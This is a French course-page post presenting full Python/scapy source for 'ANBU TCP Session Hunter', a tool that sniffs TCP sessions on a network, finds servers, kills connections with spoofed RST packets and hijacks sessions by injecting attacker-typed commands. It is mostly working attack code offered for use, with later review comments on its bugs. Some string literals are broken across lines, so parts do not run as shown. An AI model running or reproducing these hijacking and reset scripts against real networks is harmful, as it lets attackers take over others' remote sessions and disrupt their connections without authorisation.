ANBU TCP Session Hunter



ANBU TCP Session Hunter

ANBU est un projet en Python que j'ai développé il y a quelque temps, qui permet de réaliser les deux attaques vues dans ce cours de manière plus évoluée.
J'ai réalisé une vidéo de démonstration (qui sert également de didacticiel) à cette adresse :
ANBU TCP Session Hunter Demo

anbu.py:

# ANBU :: TCP Session Hunter
# Author: St0rn
#anbu.py
#
#argv[1] = interface
#
#!usr/bin/env/python

import os
import sys
import string
import thread
from scapy.all import *

# Last user command, split on spaces by the CLI loop below.
execute = []
# Index-aligned records of the TCP flows seen by the sniffer callbacks:
# entry i of each list describes the same flow (see list_remp).
ip_src, port_src, ip_dst, port_dst = [], [], [], []

def intro():
 """Print the ANBU ASCII-art banner to stdout."""
 print("                          )     )()) ( )     (")  
 print("                       ((((_)(  ((_)  )((_)    ) ")  
 print("                        ) _ )  _((_)((_)_  _ ((_)") 
 print("                        (_)_(_)| | | | _ )| | | |") 
 print("                           / _   | .` | | _ | |_| |")
 print("                         /_/ \_ |_|\_| |___/ \___/")
 print("                             TCP SESSION HUNTER")
                             
# NOTE(review): this literal is rendered here with real line breaks and no
# triple quotes, so it does not parse as shown; presumably a print of blank
# lines after the banner in the original file.
print("


")

def list_remp(p):
 """Sniffer callback: record the endpoints of a TCP/IP packet in the module lists.

 ip_src, port_src, ip_dst and port_dst are appended in lockstep, so index i
 of each list describes the same observed flow. A packet is skipped only
 when all four of its fields already appear in their respective lists;
 packets lacking either an IP or a TCP layer are ignored.
 """
 if not (p.haslayer(IP) and p.haslayer(TCP)):
  return
 src, dst = p[IP].src, p[IP].dst
 sport, dport = p[TCP].sport, p[TCP].dport
 fully_known = (src in ip_src and sport in port_src
                and dst in ip_dst and dport in port_dst)
 if fully_known:
  return
 ip_src.append(src)
 port_src.append(sport)
 ip_dst.append(dst)
 port_dst.append(dport)

def list_remp_filter(p, ip):
 """Like list_remp, but only records TCP/IP packets that involve address *ip*.

 A packet qualifies when *ip* is its source or its destination; it is then
 appended to the four index-aligned module lists unless all four of its
 fields are already present in their respective lists.
 """
 if not (p.haslayer(IP) and p.haslayer(TCP)):
  return
 src, dst = p[IP].src, p[IP].dst
 if ip != src and ip != dst:
  return
 sport, dport = p[TCP].sport, p[TCP].dport
 fully_known = (src in ip_src and sport in port_src
                and dst in ip_dst and dport in port_dst)
 if fully_known:
  return
 ip_src.append(src)
 port_src.append(sport)
 ip_dst.append(dst)
 port_dst.append(dport)
 
def sniff_connect(device):
  """Capture on *device* until interrupted, handing every packet to list_remp.

  count=0 makes scapy's sniff() run indefinitely. The bare except swallows
  the actual error (missing privileges, unknown interface, ...), prints a
  generic message and calls sys.exit(). NOTE(review): this is started with
  thread.start_new_thread from the CLI loop, so the exit presumably ends only
  that worker thread rather than the program -- confirm.
  """
  try:
   sniff(count=0, prn=list_remp, iface=device)
  except:
   print "
             Can't Launch sniffer...
"
   sys.exit()

def sniff_connect_filter(device, ip):
  """Capture on *device* until interrupted, recording only flows involving *ip*.

  Same shape as sniff_connect, but the prn callback closes over *ip* and
  delegates to list_remp_filter. The bare except hides the underlying error
  and calls sys.exit() (started from a worker thread by the CLI loop).
  """
  try:
   sniff(count=0, prn= lambda p : list_remp_filter(p,ip), iface=device)
  except:
   print "
             Can't Launch sniffer...
"
   sys.exit()

os.system("clear")
intro()

# Interactive CLI. argv[1] is the capture interface. Single-word commands are
# matched after string.lower(); anything else is split on spaces and
# dispatched on its first word below. (String literals in this listing are
# rendered with real line breaks; they were presumably escaped newlines.)
if len(sys.argv) < 2:
 print "
Usage: anbu.py <interface>
"
else:
 while 1:
    inp = raw_input("
           > ")
    if string.lower(inp) == "help" or string.lower(inp) == "h":
      # NOTE(review): the "empty" command handled below is not listed here.
      print "
             help, h:              Show Options"
      print "             server:               Server Discovery"
      print "             sniff:                sniff all Connexions"
      print "             sniff <ip>:           sniff cibled IP  :: ex: sniff 192.168.1.34"
      print "             ls:                   List Connexions"
      print "             rst <nb>:             Reset Connexion  :: ex: rst 2"
      print "             hijack <nb>:          Hijack Connexion :: ex: hijack 2"
      print "             clear:                Clear CLI"
      print "             quit, exit, q, e:     Exit"
      
    elif string.lower(inp) == "ls":
     print "
"
     # NOTE(review): `> 1` means a single recorded flow is reported as
     # "Aucune entrees"; `> 0` was presumably intended.
     if len(ip_src) > 1:
      for i in range(len(ip_src)):
       print "             ["+str(i)+"] " + ip_src[i] + ":" + str(port_src[i]) + " > " + ip_dst[i] + ":" + str(port_dst[i]) 
     else:
      print "             Aucune entrees"
    elif string.lower(inp) == "empty":
     # Rebinding the module globals is enough here because this loop runs at
     # module scope and the sniffer callbacks look the names up on each call.
     ip_src = []
     port_src = []
     ip_dst = []
     port_dst = []
    elif string.lower(inp) == "clear": 
     os.system("clear")
     intro()
    elif string.lower(inp) == "q" or string.lower(inp) == "quit" or string.lower(inp) == "e" or string.lower(inp) == "exit":
     sys.exit()
    elif string.lower(inp) == "sniff":
     # Every "sniff" starts another capture thread on the same interface;
     # no handle is kept, so they can neither be listed nor stopped.
     thread.start_new_thread(sniff_connect, (sys.argv[1], ))
    elif string.lower(inp) == "server":
     # Helper modules are spawned through the shell from the current
     # working directory, in a separate xterm.
     os.system("xterm -e python check_server.py &")
    else:
     execute = inp.split(" ")
     # NOTE(review): execute[1] raises IndexError for a bare "sniff", "rst"
     # or "hijack"; int(num) raises ValueError on a non-numeric index. Neither
     # is caught, so the CLI loop terminates on a typo.
     if string.lower(execute[0]) == "sniff":
      thread.start_new_thread(sniff_connect_filter, (sys.argv[1],execute[1], ))
     elif string.lower(execute[0]) == "rst":
      num = execute[1]
      # Argument order matches rst_hijack.py: remote_host remote_port target.
      # The values are taken from sniffed packet headers and are interpolated
      # unquoted into a shell command line.
      cmd = "xterm -e python rst_hijack.py " + ip_dst[int(num)] + " " + str(port_dst[int(num)]) + " " + str(ip_src[int(num)]) + " &"
      os.system(cmd)
     elif string.lower(execute[0]) == "hijack":
      num = execute[1]
      # Argument order matches session_hijack.py: ip_client ip_serveur
      # port_serveur iface. Same unquoted shell interpolation as above.
      cmd = "xterm -e python session_hijack.py " + ip_src[int(num)] + " " + str(ip_dst[int(num)]) + " " + str(port_dst[int(num)]) + " " + sys.argv[1] + " &"
      os.system(cmd)
     else:
      print "
             Not an option!"



check_server.py:

# ANBU :: TCP Session Hunter Module: Server Discovery
# Author: St0rn
#check_server.py
#
#!usr/bin/env/python

import os
from scapy.all import *

# Index-aligned (source address, source port) pairs already recorded by
# check_interest_server; a pair whose two halves are both present is never
# announced again.
ip, port = [], []

def check_interest_server(a):
  """Sniffer callback: announce hosts seen sending from a few well-known ports.

  Records (a.src, a.sport) in the module lists unless both the address and
  the port already appear there, then prints a label when the *source* port
  is 21, 22, 23, 513 or 3306. Classification is by source port alone (no
  banner or handshake check), so any host emitting traffic from such a port
  is reported. The caller's lfilter guarantees the IP and TCP layers exist.
  """
  if a[IP].src not in ip or a[TCP].sport not in port:
   ip.append(a[IP].src)
   port.append(a[TCP].sport)
   if a[TCP].sport == 21:
     print "[+] " + a[IP].src + " Is a FTP Server on Port 21"
   elif a[TCP].sport == 22:
     print "[+] " + a[IP].src + " Is a SSH Server on port 22"
   elif a[TCP].sport == 23:
     print "[+] " + a[IP].src + " Is a Telnet Server on port 23"
   elif a[TCP].sport == 513:
     print "[+] " + a[IP].src + " Is a Rlogin Server on port 513"
   elif a[TCP].sport == 3306:
     print "[+] " + a[IP].src + " Is a MySQL Server on port 3306"

os.system("clear")
print "-> Server Discovery
"
print " "
# Captures on scapy's default interface (no iface given) until interrupted
# (count=0). lfilter keeps only packets carrying both TCP and IP, which is
# what lets check_interest_server index those layers unguarded.
# `lambda(f):` is Python 2 tuple-parameter syntax.
sniff(count=0, prn = lambda a : check_interest_server(a), lfilter=lambda(f): f.haslayer(TCP) and f.haslayer(IP))



rst_hijack.py:

# ANBU :: TCP Session Hunter Module: RST Hijacking
# Author: St0rn
#rst_hijack.py
# 
# argv[1] = remote_host ; argv[2] = remote_port ; argv[3] = target
#
#!usr/bin/env/python
     
from scapy.all import *
import sys
import os
   
# BPF capture filter built verbatim from argv[1] (remote host) and argv[2]
# (remote port). Nothing validates either value; a malformed one presumably
# surfaces only when sniff() compiles the filter at the bottom of the file.
filtre = "host " + sys.argv[1] + " and port " + sys.argv[2]
os.system("clear")

print "
Waiting..."
print " "
     
def rst_hijack(p):
 """Sniffer callback: answer the first matching segment with a spoofed RST, then exit.

 Only segments from the remote host (argv[1]) to the target (argv[3]) are
 acted on. The reply swaps every Ether/IP/TCP endpoint of *p*, so it is
 addressed as if sent by the target back to the remote host, uses seq from
 the observed ack (and ack from the observed seq), and copies ihl, flags,
 frag, ttl, proto, dataofs, reserved, window and options from *p*.
 """
   
 if p[IP].src==sys.argv[1] and p[IP].dst==sys.argv[3]:
    print "
[+] Connection Found!"
    print " "
    print "[+] It's time to blow this shit!"
     
    ether = Ether(dst=p[Ether].src, src=p[Ether].dst)
    # The IP id is the constant 29321 on every RST emitted; a fixed id like
    # this is an easy signature for an IDS rule to match.
    ip = IP(src=p[IP].dst, dst=p[IP].src, ihl=p[IP].ihl, flags=p[IP].flags, frag=p[IP].frag, ttl=p[IP].ttl, proto=p[IP].proto, id=29321)
    tcp = TCP(sport=p[TCP].dport, dport=p[TCP].sport, seq=p[TCP].ack, ack=p[TCP].seq, dataofs=p[TCP].dataofs,
reserved=p[TCP].reserved, flags="R", window=p[TCP].window, options=p[TCP].options)
    reset = ether/ip/tcp
    # sendp() transmits at layer 2, hence the explicit Ether header above.
    sendp(reset, verbose=0)
    print "

 Press ENTER to continue
"
    raw_input()
    sys.exit()
       
# count=0: the capture runs indefinitely and ends only through the sys.exit()
# in rst_hijack (or an interrupt). `filter` is the BPF string built from argv
# above; lfilter additionally drops anything that is not IP/TCP.
# `lambda(f):` is Python 2 tuple-parameter syntax.
sniff(count=0,prn = lambda p : rst_hijack(p),filter=filtre,lfilter=lambda(f): f.haslayer(IP) and f.haslayer(TCP))



session_hijack.py:

# ANBU :: TCP Session Hunter Module: Session Hijacking
# Author: St0rn
#session_hijack.py
# 
# argv[1] = ip_client ; argv[2] = ip_serveur ; argv[3] = port_serveur ; argv[4] = iface
#
#!usr/bin/env/python

from scapy.all import *
import sys
import os

# BPF filter: PSH segments from the server (argv[2], source port argv[3]) to
# the client (argv[1]). argv values are concatenated into it unchecked.
filtre = "dst host " + sys.argv[1] + " and src host " + sys.argv[2] + " and src port " + sys.argv[3] + " and tcp[tcpflags] & tcp-push != 0"

os.system("clear") 

# Drops RST segments leaving this host with source address argv[1].
# NOTE(review): os.system() returns the command's exit status and does not
# raise on a non-zero status, so the except branch is not reached when
# iptables fails and the "[+]" line is printed regardless. argv[1] is
# interpolated unquoted into the shell command, and no `iptables -D`
# anywhere in this file removes the rule on exit.
try:
 os.system("iptables -A OUTPUT -p tcp --tcp-flags RST RST -s " + sys.argv[1] + " -j DROP") 
 print("
 [+] iptables rule added for client RST packets
")
except:
 print("
 [-] iptables rule don't added for client RST packets
")

def hijack_session(p):
  """Sniffer callback (used once): inject a single PSH/ACK segment into the captured session.

  *p* is a server-to-client segment selected by the BPF filter. The reply
  swaps every Ether/IP/TCP endpoint, so it is addressed as if sent by the
  client (argv[1]) to the server, takes seq from p's ack and ack from p's
  seq, copies the remaining header fields, and carries the payload
  "echo 1337" followed by a newline. The IP id is the constant 1337, which
  makes the injected traffic easy to fingerprint on the wire.
  """
  print(" ")
  
  ether = Ether(dst=p[Ether].src, src=p[Ether].dst)
  ip = IP(src=p[IP].dst, dst=p[IP].src, ihl=p[IP].ihl, flags=p[IP].flags, frag=p[IP].frag, ttl=p[IP].ttl,     proto=p[IP].proto, id=1337)
  tcp = TCP(sport=p[TCP].dport, dport=p[TCP].sport, seq=p[TCP].ack, ack=p[TCP].seq, dataofs=p[TCP].dataofs, reserved=p[TCP].reserved, flags="PA", window=p[TCP].window, options=p[TCP].options)

  # Literal rendered here with a real line break; presumably an escaped newline.
  hijack = ether/ip/tcp/"echo 1337
"
  sendp(hijack, verbose=0)

def perm_session(p):
  """Sniffer callback: show the server's payload, read text from stdin, inject it.

  Assumes *p* carries a Raw layer -- the BPF filter only guarantees the PSH
  flag, so an empty-payload PSH would fail on the p[Raw] lookup. The payload
  is written to stdout, then sys.stdin.read() blocks until EOF (typically
  Ctrl-D on a terminal), and the text plus a newline is sent back as a
  PSH/ACK segment built exactly like the one in hijack_session (same swapped
  endpoints, same constant IP id 1337).
  """
  os.system("clear")
  if p[Raw].load:
   sys.stdout.write(p[Raw].load + " ")

  cmd = sys.stdin.read()

  ether = Ether(dst=p[Ether].src, src=p[Ether].dst)
  ip = IP(src=p[IP].dst, dst=p[IP].src, ihl=p[IP].ihl, flags=p[IP].flags, frag=p[IP].frag, ttl=p[IP].ttl,     proto=p[IP].proto, id=1337)
  tcp = TCP(sport=p[TCP].dport, dport=p[TCP].sport, seq=p[TCP].ack, ack=p[TCP].seq, dataofs=p[TCP].dataofs, reserved=p[TCP].reserved, flags="PA", window=p[TCP].window, options=p[TCP].options)

  # Literal rendered here with a real line break; presumably an escaped newline.
  packet = ether/ip/tcp/(cmd+"
")
  sendp(packet, verbose=0)
  
 
print(" [*] Hunting TCP Session " + sys.argv[1] + " => " + sys.argv[2] + ":"+ sys.argv[3]+"
")

# First capture: the first segment matching `filtre` on argv[4] triggers
# hijack_session once (count=1). The bare except hides the real error and
# execution continues into the loop below regardless.
try:
 sniff(count = 1, prn=hijack_session, filter=filtre, lfilter = lambda(f) : f.haslayer(TCP), store=0, iface=sys.argv[4])
except:
 print(" [-] Can't launch sniffer :'(
")

# Then one capture per exchange: each matching PSH segment is handed to
# perm_session, which blocks on stdin. NOTE(review): a failing sniff() only
# prints and loops again immediately, so a persistent error (e.g. a bad
# iface) spins forever with no exit path other than an interrupt.
while 1:
 try:
  sniff(count = 1, prn=perm_session, filter=filtre,  lfilter = lambda(f) : f.haslayer(TCP), store=0, iface=sys.argv[4])
 except:
  print(" [-] can't launch sniffer :'(
")